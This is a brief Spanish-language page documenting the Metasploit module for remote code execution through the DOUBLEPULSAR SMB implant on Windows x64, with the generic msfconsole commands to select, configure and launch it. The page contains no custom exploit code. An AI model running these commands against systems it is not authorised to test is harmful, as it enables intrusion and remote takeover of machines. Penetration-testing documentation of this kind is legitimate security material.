Hacking metasploit modulo SMB DOUBLEPULSAR Remote Code Execution
www.onlinetis.com
SMB DOUBLEPULSAR Remote Code Execution
Descripción
Este módulo ejecuta una carga útil de Metasploit contra el implante DOUBLEPULSAR de Equation Group para SMB, comúnmente implementado por ETERNALBLUE.
Si bien este módulo ejecuta principalmente código contra el implante, el objetivo "Neutralizar implante" permite desactivarlo.
Plataforma
Windows
Arquitecturas
x64
msf > use exploit/windows/smb/smb_doublepulsar_rce
msf exploit(smb_doublepulsar_rce) > show targets
...targets...
msf exploit(smb_doublepulsar_rce) > set TARGET < target-id >
msf exploit(smb_doublepulsar_rce) > show options
...show and set options...
msf exploit(smb_doublepulsar_rce) > exploit